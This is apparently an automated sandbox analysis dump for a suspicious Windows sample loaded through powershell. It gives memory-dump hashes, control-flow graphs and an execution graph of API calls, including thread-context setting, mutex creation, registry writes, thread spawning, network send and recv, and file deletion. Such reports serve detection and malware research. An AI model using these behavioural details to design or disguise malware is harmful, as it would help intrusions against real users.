                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04BAA563), ref: 04BAAE9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 45a81c95ab948b16cf611a9b06adff5f13394d1128ed22e5536aa9b5c3199f7a
                                                                              • Instruction ID: b23bd1fbdea85299527d1e20c089c9c373c5bb66f1ce1d182d9c10a8607241bb
                                                                              • Opcode Fuzzy Hash: 45a81c95ab948b16cf611a9b06adff5f13394d1128ed22e5536aa9b5c3199f7a
                                                                              • Instruction Fuzzy Hash: 681126B2D043098FDB10DF9AC844BDEFBF4EB88320F148469D458A3240D378A544CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1322 4baae29-4baae70 1324 4baae7c-4baaea8 Wow64SetThreadContext 1322->1324 1325 4baae72-4baae7a 1322->1325 1326 4baaeaa-4baaeb0 1324->1326 1327 4baaeb1-4baaed2 1324->1327 1325->1324 1326->1327
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04BAA563), ref: 04BAAE9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 19f2f73e415742ed886a2de9e9a1b0ac466a62504901b6f8df5a6939af55b03f
                                                                              • Instruction ID: 30a8039174bb36dcf277b546f49caf1ed2f554fbbc57be4e1b08358ad77b4a72
                                                                              • Opcode Fuzzy Hash: 19f2f73e415742ed886a2de9e9a1b0ac466a62504901b6f8df5a6939af55b03f
                                                                              • Instruction Fuzzy Hash: 2E1104B6D042198FDB10CFAAD8447EEFBF4EB88320F25C46AD458A3610D778A545CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1329 76e2a80-76e2aa2 1330 76e2c1f-76e2c3c 1329->1330 1331 76e2aa8-76e2aad 1329->1331 1338 76e2c3e-76e2c40 1330->1338 1339 76e2c80 1330->1339 1332 76e2aaf-76e2ab5 1331->1332 1333 76e2ac5-76e2ad1 1331->1333 1335 76e2ab9-76e2ac3 1332->1335 1336 76e2ab7 1332->1336 1340 76e2bca-76e2bd4 1333->1340 1341 76e2ad7-76e2ada 1333->1341 1335->1333 1336->1333 1342 76e2c8d-76e2c91 1338->1342 1343 76e2c42-76e2c44 1338->1343 1345 76e2c81-76e2c8b 1339->1345 1349 76e2bd6-76e2bdf 1340->1349 1350 76e2be2-76e2be8 1340->1350 1341->1340 1348 76e2ae0-76e2ae7 1341->1348 1346 76e2c97-76e2c9b 1342->1346 1347 76e2d70-76e2d7a 1342->1347 1351 76e2c9e-76e2cae 1343->1351 1352 76e2c46-76e2c6a 1343->1352 1345->1342 1354 76e2c9d 1346->1354 1355 76e2cdb 1346->1355 1359 76e2d7c-76e2d85 1347->1359 1360 76e2d88-76e2d8e 1347->1360 1348->1330 1356 76e2aed-76e2af2 1348->1356 1361 76e2bee-76e2bfa 1350->1361 1362 76e2bea-76e2bec 1350->1362 1357 76e2dc5-76e2e0a 1351->1357 1374 76e2cb4-76e2cb9 1351->1374 1352->1357 1358 76e2c70-76e2c75 1352->1358 1354->1351 1363 76e2cdd-76e2cdf 1355->1363 1364 76e2b0a-76e2b0e 1356->1364 1365 76e2af4-76e2afa 1356->1365 1387 76e2fb4-76e2fe4 1357->1387 1388 76e2e10-76e2e15 1357->1388 1358->1342 1367 76e2c77-76e2c7d 1358->1367 1369 76e2d94-76e2da0 1360->1369 1370 76e2d90-76e2d92 1360->1370 1368 76e2bfc-76e2c1c 1361->1368 1362->1368 1363->1347 1371 76e2ce5-76e2ce9 1363->1371 1364->1340 1375 76e2b14-76e2b18 1364->1375 1372 76e2afe-76e2b08 1365->1372 1373 76e2afc 1365->1373 1367->1345 1377 76e2c7f 1367->1377 1378 76e2da2-76e2dc2 1369->1378 1370->1378 1371->1347 1381 76e2cef-76e2cfe 1371->1381 1372->1364 1373->1364 1383 76e2cbb-76e2cc1 1374->1383 1384 76e2cd1-76e2cd9 1374->1384 1385 76e2b1a-76e2b36 1375->1385 1386 76e2b38 1375->1386 1377->1342 1411 76e2d16-76e2d6d 1381->1411 1412 76e2d00-76e2d06 1381->1412 1392 76e2cc5-76e2ccf 1383->1392 1393 76e2cc3 1383->1393 1384->1363 1389 76e2b3a-76e2b3c 1385->1389 1386->1389 1405 76e301d-76e3027 1387->1405 1406 76e2fe6-76e3003 1387->1406 1394 76e2e2d-76e2e31 1388->1394 1395 76e2e17-76e2e1d 1388->1395 1389->1340 1396 76e2b42-76e2b4f 1389->1396 1392->1384 1393->1384 1397 76e2f5c-76e2f66 1394->1397 1398 76e2e37-76e2e3b 1394->1398 1402 76e2e1f 1395->1402 1403 76e2e21-76e2e2b 1395->1403 1432 76e2b56-76e2b58 1396->1432 1407 76e2f68-76e2f71 1397->1407 1408 76e2f74-76e2f7a 1397->1408 1409 76e2e3d-76e2e4e 1398->1409 1410 76e2e7b 1398->1410 1402->1394 1403->1394 1422 76e3029-76e302d 1405->1422 1423 76e3030-76e3036 1405->1423 1436 76e306d-76e3072 1406->1436 1437 76e3005-76e3017 1406->1437 1416 76e2f7c-76e2f7e 1408->1416 1417 76e2f80-76e2f8c 1408->1417 1409->1387 1433 76e2e54-76e2e59 1409->1433 1421 76e2e7d-76e2e7f 1410->1421 1418 76e2d0a-76e2d0c 1412->1418 1419 76e2d08 1412->1419 1427 76e2f8e-76e2fb1 1416->1427 1417->1427 1418->1411 1419->1411 1421->1397 1428 76e2e85-76e2e89 1421->1428 1430 76e303c-76e3048 1423->1430 1431 76e3038-76e303a 1423->1431 1428->1397 1435 76e2e8f-76e2e93 1428->1435 1438 76e304a-76e306a 1430->1438 1431->1438 1439 76e2b5a-76e2b60 1432->1439 1440 76e2b70-76e2bc7 1432->1440 1441 76e2e5b-76e2e61 1433->1441 1442 76e2e71-76e2e79 1433->1442 1435->1397 1444 76e2e99-76e2ebf 1435->1444 1436->1437 1437->1405 1447 76e2b64-76e2b66 1439->1447 1448 76e2b62 1439->1448 1449 76e2e65-76e2e6f 1441->1449 1450 76e2e63 1441->1450 1442->1421 1444->1397 1458 76e2ec5-76e2ec9 1444->1458 1447->1440 1448->1440 1449->1442 1450->1442 1459 76e2eec 1458->1459 1460 76e2ecb-76e2ed4 1458->1460 1463 76e2eef-76e2efc 1459->1463 1461 76e2edb-76e2ee8 1460->1461 1462 76e2ed6-76e2ed9 1460->1462 1464 76e2eea 1461->1464 1462->1464 1466 76e2f02-76e2f59 1463->1466 1464->1463
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q
                                                                              • API String ID: 0-1614139903
                                                                              • Opcode ID: 1cf08f11cda1b51c931d137c8f6e6ee94bdebb413b13f0856c0d7e3c6339255b
                                                                              • Instruction ID: 6b09730adc25cb3a8f2a4bb93bea83c096127aefb4411996db00bf71afeb5fd3
                                                                              • Opcode Fuzzy Hash: 1cf08f11cda1b51c931d137c8f6e6ee94bdebb413b13f0856c0d7e3c6339255b
                                                                              • Instruction Fuzzy Hash: A42180B0A02A06CFCB24DF79C564B6977FFBB48624F1485AAD4468B350DB71D881CBB1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2046638977.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2f2d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47db68903518923d67166e2abd9493ae3acc1ceae0734967aafc87876e5a16d3
                                                                              • Instruction ID: 2ad21ac602a5fc74884825c0a98b444905a3e63a90a21563a0bd926b1da2e5ab
                                                                              • Opcode Fuzzy Hash: 47db68903518923d67166e2abd9493ae3acc1ceae0734967aafc87876e5a16d3
                                                                              • Instruction Fuzzy Hash: 37012B315093109AE710CB29CD84767BF98EF427A4F08C429EE484B15AC379D849C6B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2046638977.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2f2d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 30ca7086214683fd540ca2a157e4967eba772a564afae4eddfe39bca2fd10981
                                                                              • Instruction ID: a4e3bfcd280f0d363250f9f9cc6bd2318f09605d6a87dfd0da5cc17ff4cac1da
                                                                              • Opcode Fuzzy Hash: 30ca7086214683fd540ca2a157e4967eba772a564afae4eddfe39bca2fd10981
                                                                              • Instruction Fuzzy Hash: 8F015E6140E3C09FE7128B258C94B52BFB4EF47624F1DC4DBD9888F1A7C2699849C772
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Xbq$$^q
                                                                              • API String ID: 0-1593437937
                                                                              • Opcode ID: 47966a9e75fb83015258345c0c78dc07604666338bb07b2a542944f4f59e2f2d
                                                                              • Instruction ID: c7aeac330c5a729d6df9ca55d3b31b6ddad4e37c7dcde8841d5b29691c8e7043
                                                                              • Opcode Fuzzy Hash: 47966a9e75fb83015258345c0c78dc07604666338bb07b2a542944f4f59e2f2d
                                                                              • Instruction Fuzzy Hash: ABD13EB0B082149FDB189B78885427E7BB7FFC5300F05889EE546DB385DE35AC52A791
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: e6aa7fe544a38f53a83825cf0be41a03a1b6a015fbf9ace0387fdff847dd38cd
                                                                              • Instruction ID: 92ae1570a12b9bc8d9a18614149f214f844d9bd7f69430e45ec031d2b5d678f2
                                                                              • Opcode Fuzzy Hash: e6aa7fe544a38f53a83825cf0be41a03a1b6a015fbf9ace0387fdff847dd38cd
                                                                              • Instruction Fuzzy Hash: AD01D461A4E3950FC72B122918205656FBA9FD3A1072A45DBC081DF39BCD954C4E87B3

                                                                              Execution Graph

                                                                              Execution Coverage:2.9%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:6.2%
                                                                              Total number of Nodes:981
                                                                              Total number of Limit Nodes:43
                                                                              execution_graph 45570 41d4d0 45571 41d4e6 _Yarn ___scrt_fastfail 45570->45571 45585 41d6e3 45571->45585 45591 431f99 21 API calls ___std_exception_copy 45571->45591 45574 41d734 45575 41d6f4 45575->45574 45577 41d760 45575->45577 45587 431f99 21 API calls ___std_exception_copy 45575->45587 45576 41d696 ___scrt_fastfail 45576->45574 45592 431f99 21 API calls ___std_exception_copy 45576->45592 45577->45574 45594 41d474 21 API calls ___scrt_fastfail 45577->45594 45581 41d72d ___scrt_fastfail 45581->45574 45588 43264f 45581->45588 45583 41d6be ___scrt_fastfail 45583->45574 45593 431f99 21 API calls ___std_exception_copy 45583->45593 45585->45574 45586 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 45585->45586 45586->45575 45587->45581 45595 43256f 45588->45595 45590 432657 45590->45577 45591->45576 45592->45583 45593->45585 45594->45574 45596 432588 45595->45596 45600 43257e 45595->45600 45596->45600 45601 431f99 21 API calls ___std_exception_copy 45596->45601 45598 4325a9 45598->45600 45602 43293a CryptAcquireContextA 45598->45602 45600->45590 45601->45598 45603 43295b CryptGenRandom 45602->45603 45605 432956 45602->45605 45604 432970 CryptReleaseContext 45603->45604 45603->45605 45604->45605 45605->45600 45606 426030 45611 4260f7 recv 45606->45611 45612 44e8b6 45613 44e8c1 45612->45613 45614 44e8e9 45613->45614 45615 44e8da 45613->45615 45616 44e8f8 45614->45616 45635 455573 27 API calls 2 library calls 45614->45635 45634 445354 20 API calls __dosmaperr 45615->45634 45621 44b9be 45616->45621 45620 44e8df ___scrt_fastfail 45622 44b9d6 45621->45622 45623 44b9cb 45621->45623 45625 44b9e7 _strftime 45622->45625 45626 44b9de 45622->45626 45636 446aff 21 API calls 3 library calls 45623->45636 45629 44ba11 RtlReAllocateHeap 45625->45629 45630 44b9ec 45625->45630 45639 442200 7 API calls 2 library calls 45625->45639 45637 446ac5 20 API calls __dosmaperr 45626->45637 45627 44b9d3 45631 44b9e4 45627->45631 45629->45625 45629->45631 45638 445354 20 API calls __dosmaperr 45630->45638 45631->45620 45634->45620 45635->45616 45636->45627 45637->45631 45638->45631 45639->45625 45640 426091 45645 42610e send 45640->45645 45646 43a998 45649 43a9a4 _swprintf __FrameHandler3::FrameUnwindToState 45646->45649 45647 43a9b2 45664 445354 20 API calls __dosmaperr 45647->45664 45649->45647 45652 43a9dc 45649->45652 45650 43a9b7 45665 43a827 26 API calls _Deallocate 45650->45665 45659 444acc EnterCriticalSection 45652->45659 45654 43a9e7 45660 43aa88 45654->45660 45656 43a9c2 __wsopen_s 45659->45654 45662 43aa96 45660->45662 45661 43a9f2 45666 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 45661->45666 45662->45661 45667 448416 39 API calls 2 library calls 45662->45667 45664->45650 45665->45656 45666->45656 45667->45662 45668 4339be 45669 4339ca __FrameHandler3::FrameUnwindToState 45668->45669 45700 4336b3 45669->45700 45671 4339d1 45672 433b24 45671->45672 45675 4339fb 45671->45675 46000 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 45672->46000 45674 433b2b 46001 4426be 28 API calls _abort 45674->46001 45687 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45675->45687 45994 4434d1 5 API calls ___crtLCMapStringA 45675->45994 45677 433b31 46002 442670 28 API calls _abort 45677->46002 45680 433a14 45682 433a1a 45680->45682 45995 443475 5 API calls ___crtLCMapStringA 45680->45995 45681 433b39 45684 433a9b 45711 433c5e 45684->45711 45687->45684 45996 43edf4 38 API calls 3 library calls 45687->45996 45694 433abd 45694->45674 45695 433ac1 45694->45695 45696 433aca 45695->45696 45998 442661 28 API calls _abort 45695->45998 45999 433842 13 API calls 2 library calls 45696->45999 45699 433ad2 45699->45682 45701 4336bc 45700->45701 46003 433e0a IsProcessorFeaturePresent 45701->46003 45703 4336c8 46004 4379ee 10 API calls 3 library calls 45703->46004 45705 4336cd 45710 4336d1 45705->45710 46005 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45705->46005 45707 4336e8 45707->45671 45708 4336da 45708->45707 46006 437a17 8 API calls 3 library calls 45708->46006 45710->45671 46007 436050 45711->46007 45714 433aa1 45715 443422 45714->45715 46009 44ddc9 45715->46009 45717 44342b 45719 433aaa 45717->45719 46013 44e0d3 38 API calls 45717->46013 45720 40d767 45719->45720 46015 41bce3 LoadLibraryA GetProcAddress 45720->46015 45722 40d783 GetModuleFileNameW 46020 40e168 45722->46020 45724 40d79f 46035 401fbd 45724->46035 45727 401fbd 28 API calls 45728 40d7bd 45727->45728 46039 41afc3 45728->46039 45732 40d7cf 46064 401d8c 45732->46064 45734 40d7d8 45735 40d835 45734->45735 45736 40d7eb 45734->45736 46070 401d64 45735->46070 46321 40e986 90 API calls 45736->46321 45739 40d845 45742 401d64 28 API calls 45739->45742 45740 40d7fd 45741 401d64 28 API calls 45740->45741 45745 40d809 45741->45745 45743 40d864 45742->45743 46075 404cbf 45743->46075 46322 40e937 68 API calls 45745->46322 45746 40d873 46079 405ce6 45746->46079 45749 40d824 46323 40e155 68 API calls 45749->46323 45750 40d87f 46082 401eef 45750->46082 45753 40d88b 46086 401eea 45753->46086 45755 40d894 45757 401eea 26 API calls 45755->45757 45756 401eea 26 API calls 45758 40dc9f 45756->45758 45759 40d89d 45757->45759 45997 433c94 GetModuleHandleW 45758->45997 45760 401d64 28 API calls 45759->45760 45761 40d8a6 45760->45761 46090 401ebd 45761->46090 45763 40d8b1 45764 401d64 28 API calls 45763->45764 45765 40d8ca 45764->45765 45766 401d64 28 API calls 45765->45766 45768 40d8e5 45766->45768 45767 40d946 45770 401d64 28 API calls 45767->45770 45785 40e134 45767->45785 45768->45767 46324 4085b4 45768->46324 45775 40d95d 45770->45775 45771 40d912 45772 401eef 26 API calls 45771->45772 45773 40d91e 45772->45773 45776 401eea 26 API calls 45773->45776 45774 40d9a4 46094 40bed7 45774->46094 45775->45774 45781 4124b7 3 API calls 45775->45781 45777 40d927 45776->45777 46328 4124b7 RegOpenKeyExA 45777->46328 45779 40d9aa 45780 40d82d 45779->45780 46097 41a463 45779->46097 45780->45756 45786 40d988 45781->45786 45784 40d9c5 45787 40da18 45784->45787 46114 40697b 45784->46114 46404 412902 30 API calls 45785->46404 45786->45774 46331 412902 30 API calls 45786->46331 45789 401d64 28 API calls 45787->45789 45792 40da21 45789->45792 45801 40da32 45792->45801 45802 40da2d 45792->45802 45794 40e14a 46405 4112b5 64 API calls ___scrt_fastfail 45794->46405 45796 40d9e4 46332 40699d 30 API calls 45796->46332 45797 40d9ee 45799 401d64 28 API calls 45797->45799 45809 40d9f7 45799->45809 45806 401d64 28 API calls 45801->45806 46335 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 45802->46335 45803 40d9e9 46333 4064d0 97 API calls 45803->46333 45807 40da3b 45806->45807 46118 41ae08 45807->46118 45809->45787 45812 40da13 45809->45812 45810 40da46 46122 401e18 45810->46122 46334 4064d0 97 API calls 45812->46334 45813 40da51 46126 401e13 45813->46126 45816 40da5a 45817 401d64 28 API calls 45816->45817 45818 40da63 45817->45818 45819 401d64 28 API calls 45818->45819 45820 40da7d 45819->45820 45821 401d64 28 API calls 45820->45821 45822 40da97 45821->45822 45823 401d64 28 API calls 45822->45823 45825 40dab0 45823->45825 45824 40db1d 45826 40db2c 45824->45826 45833 40dcaa ___scrt_fastfail 45824->45833 45825->45824 45827 401d64 28 API calls 45825->45827 45828 40db35 45826->45828 45856 40dbb1 ___scrt_fastfail 45826->45856 45831 40dac5 _wcslen 45827->45831 45829 401d64 28 API calls 45828->45829 45830 40db3e 45829->45830 45832 401d64 28 API calls 45830->45832 45831->45824 45834 401d64 28 API calls 45831->45834 45835 40db50 45832->45835 46395 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 45833->46395 45836 40dae0 45834->45836 45838 401d64 28 API calls 45835->45838 45839 401d64 28 API calls 45836->45839 45840 40db62 45838->45840 45841 40daf5 45839->45841 45843 401d64 28 API calls 45840->45843 46336 40c89e 45841->46336 45842 40dcef 45844 401d64 28 API calls 45842->45844 45845 40db8b 45843->45845 45846 40dd16 45844->45846 45850 401d64 28 API calls 45845->45850 46140 401f66 45846->46140 45849 401e18 26 API calls 45852 40db14 45849->45852 45853 40db9c 45850->45853 45855 401e13 26 API calls 45852->45855 46393 40bc67 45 API calls _wcslen 45853->46393 45854 40dd25 46144 4126d2 RegCreateKeyA 45854->46144 45855->45824 46130 4128a2 45856->46130 45860 40dc45 ctype 45865 401d64 28 API calls 45860->45865 45861 40dbac 45861->45856 45863 401d64 28 API calls 45864 40dd47 45863->45864 46150 43a5e7 45864->46150 45866 40dc5c 45865->45866 45866->45842 45870 40dc70 45866->45870 45869 40dd5e 46396 41beb0 86 API calls ___scrt_fastfail 45869->46396 45872 401d64 28 API calls 45870->45872 45871 40dd81 45876 401f66 28 API calls 45871->45876 45874 40dc7e 45872->45874 45877 41ae08 28 API calls 45874->45877 45875 40dd65 CreateThread 45875->45871 46803 41c96f 10 API calls 45875->46803 45878 40dd96 45876->45878 45879 40dc87 45877->45879 45880 401f66 28 API calls 45878->45880 46394 40e219 109 API calls 45879->46394 45883 40dda5 45880->45883 45882 40dc8c 45882->45842 45885 40dc93 45882->45885 46154 41a686 45883->46154 45885->45780 45887 401d64 28 API calls 45888 40ddb6 45887->45888 45889 401d64 28 API calls 45888->45889 45890 40ddcb 45889->45890 45891 401d64 28 API calls 45890->45891 45892 40ddeb 45891->45892 45893 43a5e7 42 API calls 45892->45893 45894 40ddf8 45893->45894 45895 401d64 28 API calls 45894->45895 45896 40de03 45895->45896 45897 401d64 28 API calls 45896->45897 45898 40de14 45897->45898 45899 401d64 28 API calls 45898->45899 45900 40de29 45899->45900 45901 401d64 28 API calls 45900->45901 45902 40de3a 45901->45902 45903 40de41 StrToIntA 45902->45903 46178 409517 45903->46178 45906 401d64 28 API calls 45907 40de5c 45906->45907 45908 40dea1 45907->45908 45909 40de68 45907->45909 45912 401d64 28 API calls 45908->45912 46397 43360d 22 API calls 3 library calls 45909->46397 45911 40de71 45914 401d64 28 API calls 45911->45914 45913 40deb1 45912->45913 45916 40def9 45913->45916 45917 40debd 45913->45917 45915 40de84 45914->45915 45918 40de8b CreateThread 45915->45918 45920 401d64 28 API calls 45916->45920 46398 43360d 22 API calls 3 library calls 45917->46398 45918->45908 46807 419128 102 API calls __EH_prolog 45918->46807 45922 40df02 45920->45922 45921 40dec6 45923 401d64 28 API calls 45921->45923 45925 40df6c 45922->45925 45926 40df0e 45922->45926 45924 40ded8 45923->45924 45928 40dedf CreateThread 45924->45928 45929 401d64 28 API calls 45925->45929 45927 401d64 28 API calls 45926->45927 45931 40df1e 45927->45931 45928->45916 46806 419128 102 API calls __EH_prolog 45928->46806 45930 40df75 45929->45930 45932 40df81 45930->45932 45933 40dfba 45930->45933 45934 401d64 28 API calls 45931->45934 45936 401d64 28 API calls 45932->45936 46203 41a7a2 GetComputerNameExW GetUserNameW 45933->46203 45937 40df33 45934->45937 45939 40df8a 45936->45939 46399 40c854 31 API calls 45937->46399 45944 401d64 28 API calls 45939->45944 45940 401e18 26 API calls 45941 40dfce 45940->45941 45943 401e13 26 API calls 45941->45943 45946 40dfd7 45943->45946 45947 40df9f 45944->45947 45945 40df46 45948 401e18 26 API calls 45945->45948 45949 40dfe0 SetProcessDEPPolicy 45946->45949 45950 40dfe3 CreateThread 45946->45950 45957 43a5e7 42 API calls 45947->45957 45951 40df52 45948->45951 45949->45950 45952 40e004 45950->45952 45953 40dff8 CreateThread 45950->45953 46775 40e54f 45950->46775 45954 401e13 26 API calls 45951->45954 45955 40e019 45952->45955 45956 40e00d CreateThread 45952->45956 45953->45952 46802 410f36 136 API calls 45953->46802 45958 40df5b CreateThread 45954->45958 45960 40e073 45955->45960 45962 401f66 28 API calls 45955->45962 45956->45955 46804 411524 38 API calls ___scrt_fastfail 45956->46804 45959 40dfac 45957->45959 45958->45925 46805 40196b 49 API calls 45958->46805 46400 40b95c 7 API calls 45959->46400 46214 41246e RegOpenKeyExA 45960->46214 45963 40e046 45962->45963 46401 404c9e 28 API calls 45963->46401 45966 40e053 45968 401f66 28 API calls 45966->45968 45970 40e062 45968->45970 45969 40e12a 46226 40cbac 45969->46226 45974 41a686 79 API calls 45970->45974 45972 41ae08 28 API calls 45973 40e0a4 45972->45973 46217 412584 RegOpenKeyExW 45973->46217 45976 40e067 45974->45976 45978 401eea 26 API calls 45976->45978 45978->45960 45981 401e13 26 API calls 45984 40e0c5 45981->45984 45982 40e0ed DeleteFileW 45983 40e0f4 45982->45983 45982->45984 45986 41ae08 28 API calls 45983->45986 45984->45982 45984->45983 45985 40e0db Sleep 45984->45985 46402 401e07 45985->46402 45988 40e104 45986->45988 46222 41297a RegOpenKeyExW 45988->46222 45990 40e117 45991 401e13 26 API calls 45990->45991 45992 40e121 45991->45992 45993 401e13 26 API calls 45992->45993 45993->45969 45994->45680 45995->45687 45996->45684 45997->45694 45998->45696 45999->45699 46000->45674 46001->45677 46002->45681 46003->45703 46004->45705 46005->45708 46006->45710 46008 433c71 GetStartupInfoW 46007->46008 46008->45714 46010 44dddb 46009->46010 46011 44ddd2 46009->46011 46010->45717 46014 44dcc8 51 API calls 4 library calls 46011->46014 46013->45717 46014->46010 46016 41bd22 LoadLibraryA GetProcAddress 46015->46016 46017 41bd12 GetModuleHandleA GetProcAddress 46015->46017 46018 41bd4b 32 API calls 46016->46018 46019 41bd3b LoadLibraryA GetProcAddress 46016->46019 46017->46016 46018->45722 46019->46018 46406 41a63f FindResourceA 46020->46406 46024 40e192 _Yarn 46418 401f86 46024->46418 46027 401eef 26 API calls 46028 40e1b8 46027->46028 46029 401eea 26 API calls 46028->46029 46030 40e1c1 46029->46030 46031 43a88c ___std_exception_copy 21 API calls 46030->46031 46032 40e1d2 _Yarn 46031->46032 46422 406052 46032->46422 46034 40e205 46034->45724 46036 401fcc 46035->46036 46432 402501 46036->46432 46038 401fea 46038->45727 46040 41afd6 46039->46040 46044 41b048 46040->46044 46050 401eef 26 API calls 46040->46050 46055 401eea 26 API calls 46040->46055 46059 41b046 46040->46059 46437 403b60 28 API calls 46040->46437 46438 41bfa9 28 API calls 46040->46438 46041 401eea 26 API calls 46042 41b078 46041->46042 46043 401eea 26 API calls 46042->46043 46045 41b080 46043->46045 46439 403b60 28 API calls 46044->46439 46048 401eea 26 API calls 46045->46048 46051 40d7c6 46048->46051 46049 41b054 46052 401eef 26 API calls 46049->46052 46050->46040 46060 40e8bd 46051->46060 46053 41b05d 46052->46053 46054 401eea 26 API calls 46053->46054 46056 41b065 46054->46056 46055->46040 46440 41bfa9 28 API calls 46056->46440 46059->46041 46061 40e8ca 46060->46061 46063 40e8da 46061->46063 46441 40200a 26 API calls 46061->46441 46063->45732 46065 40200a 46064->46065 46069 40203a 46065->46069 46442 402654 26 API calls 46065->46442 46067 40202b 46443 4026ba 26 API calls _Deallocate 46067->46443 46069->45734 46071 401d6c 46070->46071 46072 401d74 46071->46072 46444 401fff 28 API calls 46071->46444 46072->45739 46076 404ccb 46075->46076 46445 402e78 46076->46445 46078 404cee 46078->45746 46454 404bc4 46079->46454 46081 405cf4 46081->45750 46083 401efe 46082->46083 46085 401f0a 46083->46085 46463 4021b9 26 API calls 46083->46463 46085->45753 46087 4021b9 46086->46087 46088 4021e8 46087->46088 46464 40262e 26 API calls _Deallocate 46087->46464 46088->45755 46092 401ec9 46090->46092 46091 401ee4 46091->45763 46092->46091 46093 402325 28 API calls 46092->46093 46093->46091 46465 401e8f 46094->46465 46096 40bee1 CreateMutexA GetLastError 46096->45779 46467 41b15b 46097->46467 46102 401eef 26 API calls 46103 41a49f 46102->46103 46104 401eea 26 API calls 46103->46104 46105 41a4a7 46104->46105 46106 41a4fa 46105->46106 46107 412513 31 API calls 46105->46107 46106->45784 46108 41a4cd 46107->46108 46109 41a4d8 StrToIntA 46108->46109 46110 41a4ef 46109->46110 46111 41a4e6 46109->46111 46113 401eea 26 API calls 46110->46113 46475 41c102 28 API calls 46111->46475 46113->46106 46115 40698f 46114->46115 46116 4124b7 3 API calls 46115->46116 46117 406996 46116->46117 46117->45796 46117->45797 46119 41ae1c 46118->46119 46476 40b027 46119->46476 46121 41ae24 46121->45810 46123 401e27 46122->46123 46125 401e33 46123->46125 46485 402121 26 API calls 46123->46485 46125->45813 46128 402121 46126->46128 46127 402150 46127->45816 46128->46127 46486 402718 26 API calls _Deallocate 46128->46486 46131 4128c0 46130->46131 46132 406052 28 API calls 46131->46132 46133 4128d5 46132->46133 46134 401fbd 28 API calls 46133->46134 46135 4128e5 46134->46135 46136 4126d2 29 API calls 46135->46136 46137 4128ef 46136->46137 46138 401eea 26 API calls 46137->46138 46139 4128fc 46138->46139 46139->45860 46141 401f6e 46140->46141 46487 402301 46141->46487 46145 412722 46144->46145 46148 4126eb 46144->46148 46146 401eea 26 API calls 46145->46146 46147 40dd3b 46146->46147 46147->45863 46149 4126fd RegSetValueExA RegCloseKey 46148->46149 46149->46145 46151 43a600 _swprintf 46150->46151 46491 43993e 46151->46491 46155 41a737 46154->46155 46156 41a69c GetLocalTime 46154->46156 46158 401eea 26 API calls 46155->46158 46157 404cbf 28 API calls 46156->46157 46159 41a6de 46157->46159 46160 41a73f 46158->46160 46161 405ce6 28 API calls 46159->46161 46162 401eea 26 API calls 46160->46162 46163 41a6ea 46161->46163 46164 40ddaa 46162->46164 46525 4027cb 46163->46525 46164->45887 46166 41a6f6 46167 405ce6 28 API calls 46166->46167 46168 41a702 46167->46168 46528 406478 76 API calls 46168->46528 46170 41a710 46171 401eea 26 API calls 46170->46171 46172 41a71c 46171->46172 46173 401eea 26 